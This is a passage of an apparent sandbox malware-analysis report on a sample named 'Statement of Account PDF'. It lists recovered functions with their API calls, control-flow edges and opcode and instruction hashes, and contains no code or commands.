                                                        • Instruction ID: e9e23f0036f0f97227f06d7ac266fbee80906fb9fd9eacf8a27c94ee621dc22f
                                                        • Opcode Fuzzy Hash: de48f63dd1de2ec36bcb688b880b91511f3ec439a3b2a05e3f5d4a8a72dd7174
                                                        • Instruction Fuzzy Hash: 152127B2C006599BCB14CF9AC5447DEFBF4FB48320F10856AE958A7244D738AA44CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01018168 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2507 1018168-10181ba 2509 10181c2-10181ed DeleteFileW 2507->2509 2510 10181bc-10181bf 2507->2510 2511 10181f6-101821e 2509->2511 2512 10181ef-10181f5 2509->2512 2510->2509 2512->2511
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 010181E0
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4073010284.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1010000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 2417569666f447bfddf8384c105029756de40efb189997a83f56d96da66bc001
                                                        • Instruction ID: ef12bedd9b3d696eaacdabe44400ca949ecfe1ca14ce2f70c40e1b3b2bec7c12
                                                        • Opcode Fuzzy Hash: 2417569666f447bfddf8384c105029756de40efb189997a83f56d96da66bc001
                                                        • Instruction Fuzzy Hash: DF2136B2C0065A9FDB14CFAAC5447DEFBF4BF08320F14856AD958A7254D338AA44CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0101F088 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2515 101f088-101f0fc GlobalMemoryStatusEx 2517 101f105-101f12d 2515->2517 2518 101f0fe-101f104 2515->2518 2518->2517
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0101F0EF
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4073010284.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1010000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: 619d54ade1b902852175368fb3809c89e86af242f141336a573a6ae06f159b8a
                                                        • Instruction ID: dce7d6364ed8897eefd85ee84badf53a36bfcef1ad25470584d7e3936373f8c9
                                                        • Opcode Fuzzy Hash: 619d54ade1b902852175368fb3809c89e86af242f141336a573a6ae06f159b8a
                                                        • Instruction Fuzzy Hash: B71123B1C0025A9BCB10CF9AC544BDEFBF4AF48320F10816AE818A7244D378A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06954B29 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XPcq
                                                        • API String ID: 0-714321711
                                                        • Opcode ID: d48aa812503366016363de3660d984c8209ef1c74a13b0ec1304ce86cc105bb6
                                                        • Instruction ID: 567bd5e85fdc40f1cc4a69ebd6ded2f4b945a2996ef458df5d68138bedbee2f0
                                                        • Opcode Fuzzy Hash: d48aa812503366016363de3660d984c8209ef1c74a13b0ec1304ce86cc105bb6
                                                        • Instruction Fuzzy Hash: C4418C30B002089FDB55DFA5C854BAEBBF6BF88700F20852AE109AB395DB749C419F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695DA88 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: 8ff9725ffd7ef2afdcaec675ef5846f576eb2218533545434fab45da3ea02878
                                                        • Instruction ID: 746f9c2b868674f572fe7089647510ef74a0816386bc07c3c00f92d4b2471cf3
                                                        • Opcode Fuzzy Hash: 8ff9725ffd7ef2afdcaec675ef5846f576eb2218533545434fab45da3ea02878
                                                        • Instruction Fuzzy Hash: EC418030E002099FDF55EFA5C85469EBBB6FF85300F214529D806EB740DB71E94ACB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695DA75 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: 9b9248386405d1c4d6e9fbe88ec09eef105c8d360d276fc267d91f2aebe3d975
                                                        • Instruction ID: 422e67df3f2841b5eb661f6225a66606215e57b5d7f95846a14161cffc2e5187
                                                        • Opcode Fuzzy Hash: 9b9248386405d1c4d6e9fbe88ec09eef105c8d360d276fc267d91f2aebe3d975
                                                        • Instruction Fuzzy Hash: D1419130E002099FDB65EF75C89469EBBB6FF85300F21492AD851EB740EB71D94ACB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 069521B5 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: e9760700a0e1a5640480c9f04f9a4f1ff89510d615d7fea00de6e8e3c0299de0
                                                        • Instruction ID: aba0bd4c2ab574562506ced4b088ccdc6bacc3f51006dab1acc0e9214bdea24e
                                                        • Opcode Fuzzy Hash: e9760700a0e1a5640480c9f04f9a4f1ff89510d615d7fea00de6e8e3c0299de0
                                                        • Instruction Fuzzy Hash: 9B314630B002059FCB49EB74C91836E7BA7AF89204F258929C406DB394EF35DE46CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 069521C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: 0d673b75f806f5d1a1582a315d1a1e50a54755d7c8f2cb97832c8cde7deaa8c1
                                                        • Instruction ID: ebcd601771cd993d2e1ca8bf78a7309a7aaed11f18f6e461806501b33ee4913c
                                                        • Opcode Fuzzy Hash: 0d673b75f806f5d1a1582a315d1a1e50a54755d7c8f2cb97832c8cde7deaa8c1
                                                        • Instruction Fuzzy Hash: 8E310530B002059FDB49EB74C91876F7BE7AF88200F208429D806DB394EE35DE46CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06958298 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q
                                                        • API String ID: 0-388095546
                                                        • Opcode ID: ab6413ebff45a522c385d954da5e987690b1b6fa6aae8cbf1d3160d0abdc8a33
                                                        • Instruction ID: 81554cb08aa267a6d4c6f2c26cfe56a6a3200d57be69798c160972537c185c6c
                                                        • Opcode Fuzzy Hash: ab6413ebff45a522c385d954da5e987690b1b6fa6aae8cbf1d3160d0abdc8a33
                                                        • Instruction Fuzzy Hash: 79F02230B04229DFDF68EA59EB912B877B9FB40340F220826CD05CBA04D731ED06CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01300554 Relevance: .4, Instructions: 402COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc72123dddbd5e2adb6bf50ef06d46b980e3d3a9fd388e2a3721adb04d11682b
                                                        • Instruction ID: e6cdd36c2c552265ed23ed1820624940099c5b720cc8e62def1e4fb1bbd9d970
                                                        • Opcode Fuzzy Hash: bc72123dddbd5e2adb6bf50ef06d46b980e3d3a9fd388e2a3721adb04d11682b
                                                        • Instruction Fuzzy Hash: BB418B30E00709DFDB19DF69C85469DBBF2FF89314F148659E5497B260EB70A981CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695B1E8 Relevance: .3, Instructions: 293COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2816d1df523e11d38b8f1baf76b89f001e6179e6e87d0917be81d54ad9a654b9
                                                        • Instruction ID: 13197bdee2dd9d2272a2d14bb70100b34c6ed32682df54dee999e15b5a718d1f
                                                        • Opcode Fuzzy Hash: 2816d1df523e11d38b8f1baf76b89f001e6179e6e87d0917be81d54ad9a654b9
                                                        • Instruction Fuzzy Hash: 17A1C834F101099FDF64DFACC9A07AE77AAEB85310F314825E809E7799CA35DC828B51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 069561C0 Relevance: .2, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 982337e7249e12e5bded693408f148341e735d7b9a76306da2897aea165beb71
                                                        • Instruction ID: b5056a97c287051878445e586c9e702cd701013fe51ca3f02c8a6e7a39c6290c
                                                        • Opcode Fuzzy Hash: 982337e7249e12e5bded693408f148341e735d7b9a76306da2897aea165beb71
                                                        • Instruction Fuzzy Hash: 2961C171F001214FCF509A7EC89466FBADBAFC4624B66443AD80EDB364DE66DD0287C2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06954268 Relevance: .2, Instructions: 224COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 642dad5dc3ba15d54af314e2f1eb8752d6ad0e9b86b2a2209ed4da80f3990d0e
                                                        • Instruction ID: a28eeb849d438dee2669fa5f064ee72e88ff10c699c83e50b153946d654d5c36
                                                        • Opcode Fuzzy Hash: 642dad5dc3ba15d54af314e2f1eb8752d6ad0e9b86b2a2209ed4da80f3990d0e
                                                        • Instruction Fuzzy Hash: 53816234B102099FDF94DFA4D59479EB7F6AF84704F218529D80ADB794EB34EC828B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695458C Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2942dfa99720f9f7a4a7a8fd994d3dba5682c0579d7fffc813b18a4d22f39788
                                                        • Instruction ID: b7afe19deaf6483175b3b39261db4f9eda1681efb1a1165342555dab63808ac3
                                                        • Opcode Fuzzy Hash: 2942dfa99720f9f7a4a7a8fd994d3dba5682c0579d7fffc813b18a4d22f39788
                                                        • Instruction Fuzzy Hash: 1E913F30E106198FDF60DF68C890B9DB7B1FF85700F208695D549BB295EB70AA85CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06954278 Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e12ae364185d70aa3cd358427d6e6793137f7fa7d3c96ac63f41ece6ce38cda5
                                                        • Instruction ID: 8babb1faf172409f07135f70e95f73012663bdc8e015fef3f17f4b2c807c1786
                                                        • Opcode Fuzzy Hash: e12ae364185d70aa3cd358427d6e6793137f7fa7d3c96ac63f41ece6ce38cda5
                                                        • Instruction Fuzzy Hash: BB816134B102099FDF84DFA9D55475EB7F6AF88704F218429D80ADB794EB34EC828B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 069545A0 Relevance: .2, Instructions: 210COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: addce84e774c5ce5ce32eda213c49e3804f7906932a44fe8116557f01c5cc849
                                                        • Instruction ID: dd3b1f4728fab967631b8474ff8fd34b3a0dd3079eded2bfbc5c2b3dac2ba3ac
                                                        • Opcode Fuzzy Hash: addce84e774c5ce5ce32eda213c49e3804f7906932a44fe8116557f01c5cc849
                                                        • Instruction Fuzzy Hash: 44913E30E106198BDF60DF68C890B9DB7B1FF89700F208595D549BB395EB70AA85CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695EED8 Relevance: .2, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8d580352fc8e488e84bf8c9692de8247877704fe19e311d4fa4b2d6d27331d6
                                                        • Instruction ID: cf878491c86d26e4ccf5981aa0542967e91629478c69b343a52efeed49bd2d8c
                                                        • Opcode Fuzzy Hash: e8d580352fc8e488e84bf8c9692de8247877704fe19e311d4fa4b2d6d27331d6
                                                        • Instruction Fuzzy Hash: ED717B70A002099FCB54DFA9D990A9DBBF6FF84310F258429E849EB758DB31ED46CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695EEE8 Relevance: .2, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40ef4032cc508338b29c4f19d19ad4a7601ba284175f4ef43386055788b1fc03
                                                        • Instruction ID: dbefb6fc8e79e97bb696a98625843cb5a61575e057b13840c421171d866b92c1
                                                        • Opcode Fuzzy Hash: 40ef4032cc508338b29c4f19d19ad4a7601ba284175f4ef43386055788b1fc03
                                                        • Instruction Fuzzy Hash: 44716C70A002099FCB44DFA9D990A9EBBF6FF84314F258429E805EB758DB30ED46CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695FC41 Relevance: .2, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 780af3566622db3a6b0395e637d8c66bdb3e5e1923ddbd1db7f3c824c64078d7
                                                        • Instruction ID: 856c987411f7b5ca229a375aacdae9f476ecb32760412266e0c7b0dc14ec192f
                                                        • Opcode Fuzzy Hash: 780af3566622db3a6b0395e637d8c66bdb3e5e1923ddbd1db7f3c824c64078d7
                                                        • Instruction Fuzzy Hash: 2E51C031E00209DFCF14EB78E4946AEB7B6EF84325F21887AE50AD7650DB319945CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695F9EF Relevance: .2, Instructions: 167COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 623eaa1f0a23253fa3213e23cc003eb7df953c42e0c47297ca79ba476bc05809
                                                        • Instruction ID: ae4fe0dabd2e8a421442d3f4e365795f2e44f61ed8262253d6923a52a1e5a5ea
                                                        • Opcode Fuzzy Hash: 623eaa1f0a23253fa3213e23cc003eb7df953c42e0c47297ca79ba476bc05809
                                                        • Instruction Fuzzy Hash: 0351B930B102049FEF64A66CD96476F365ED789320F21483AE80AD7799DA7ACC454BA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695FA00 Relevance: .2, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 65515c569f5ecdc42f333125e4796fe65438364053a4e50b707c553352b58e79
                                                        • Instruction ID: 93363f22d052b08eaf88e06c133f766066d6ee8641c5bebf1793fd93187893f7
                                                        • Opcode Fuzzy Hash: 65515c569f5ecdc42f333125e4796fe65438364053a4e50b707c553352b58e79
                                                        • Instruction Fuzzy Hash: 3B51B930B10204DFEF64A66CD96476F365ED789320F314826E81ED7798DA7ACC454BA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 069553F0 Relevance: .1, Instructions: 126COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9722e1a0a04453ccc69bdbf390934f4101fd40408630520b240fac8fc00d09d
                                                        • Instruction ID: e037297a41f77ec8b37f97c88d107c4c611b28bd18bcd228d52864ab94740cf1
                                                        • Opcode Fuzzy Hash: d9722e1a0a04453ccc69bdbf390934f4101fd40408630520b240fac8fc00d09d
                                                        • Instruction Fuzzy Hash: B0416F71E006098FDF70CE99D880AAFF7B6EB84310F22492AE516D7A51D330E8558B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695D928 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e072b5c462b139cc1e1e1e6b3edc3ca4d8df4ecbfca9e5f7a892249cdf26ffd
                                                        • Instruction ID: 304c9ca01f9ea6f20e8b0ce97185c615515cfe1a94d001bbf92d03717603349c
                                                        • Opcode Fuzzy Hash: 2e072b5c462b139cc1e1e1e6b3edc3ca4d8df4ecbfca9e5f7a892249cdf26ffd
                                                        • Instruction Fuzzy Hash: 2531C430E1030A9FCF25DF65C9A069EB7B5EF85304F254929E805EB714EB70E94ACB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01300FF1 Relevance: .1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b50d31c80c279e696f1c3e5d27312d5146d9cf0c8be1e2c9bad8ed44b68f5a4a
                                                        • Instruction ID: 4a48cb2c21cf9fc1b3fa79436c0e1e12af9a5c6630ef60ed8ca5ca26a6714108
                                                        • Opcode Fuzzy Hash: b50d31c80c279e696f1c3e5d27312d5146d9cf0c8be1e2c9bad8ed44b68f5a4a
                                                        • Instruction Fuzzy Hash: 0B319C30A002098FCB52EB78D8A0AAEB7F5EF89314F104529D00ADB355DB75EC06CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06952078 Relevance: .1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a0016c1d8747fc80be1859b8518edac41f57f2bb57710199e13ce2e74dfca36
                                                        • Instruction ID: 0f0022790fa363ef0c52d853d62ebca879add0421ee15613303f1e75e6cdbc6f
                                                        • Opcode Fuzzy Hash: 5a0016c1d8747fc80be1859b8518edac41f57f2bb57710199e13ce2e74dfca36
                                                        • Instruction Fuzzy Hash: 8231AF34E146099FCB15CF75D894A9EBBB2FF89300F248929E806E7750DB71AD86CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01301000 Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6487d790ee5cc3cca17cfffd14fe57fe111b0105804d51460af7f216c1fe29c0
                                                        • Instruction ID: 4952e84c6acd03490e9b6e463a7cf44e94c6bd236d05d5b1a11c2ff6df65e44f
                                                        • Opcode Fuzzy Hash: 6487d790ee5cc3cca17cfffd14fe57fe111b0105804d51460af7f216c1fe29c0
                                                        • Instruction Fuzzy Hash: 04318D30B002099FCF51EB68D990AAFB7F5EB88314F104528D01AE7355EB75ED028B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 069553E0 Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00c084624aefe9c7066354a3e79067d382c953472edcec0bebcffd96dafcc4cf
                                                        • Instruction ID: 9825f6d5055ae9f3b677a139332c8b75269f17b68d2275992ac06a7c598a2e6c
                                                        • Opcode Fuzzy Hash: 00c084624aefe9c7066354a3e79067d382c953472edcec0bebcffd96dafcc4cf
                                                        • Instruction Fuzzy Hash: 1831A171E006058FCB70CE99C8C1AAFFBB6FB84310F22492AD556D7A55D730E8558B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06952088 Relevance: .1, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7f1b006a11419b85e784861f6184d23962c97c585fb3a9b28e4084697ab4d146
                                                        • Instruction ID: f476d84d69804d4df66dc5ed004568ce5ffefbe6a8913d1cc270ef85310b2b44
                                                        • Opcode Fuzzy Hash: 7f1b006a11419b85e784861f6184d23962c97c585fb3a9b28e4084697ab4d146
                                                        • Instruction Fuzzy Hash: C9318034F102099BCB15CF65D894A9EB7B6FF89300F108929E916E7750DB71AD82CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06953E70 Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cbddacf9b38808e6823e199faddff6ea5370bab3c96f6f83860ffd9484e481b
                                                        • Instruction ID: d12ec08c0c115a8bfdab961f0de21ae51353655a8c03e902948cafb6982bc33d
                                                        • Opcode Fuzzy Hash: 6cbddacf9b38808e6823e199faddff6ea5370bab3c96f6f83860ffd9484e481b
                                                        • Instruction Fuzzy Hash: 43219F75F112199FDB00DFB8D950AEEBBF5AB48250F158425E949E7344E730EC028B94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06953E80 Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 099fe908d8a05e373caa1f052be4de2b7dc84c698f1f28a0d632657eb217608f
                                                        • Instruction ID: 273a69d07e8b63bb5d41b123bbb934066b3c55b4276333dadd27e5ba91305c6d
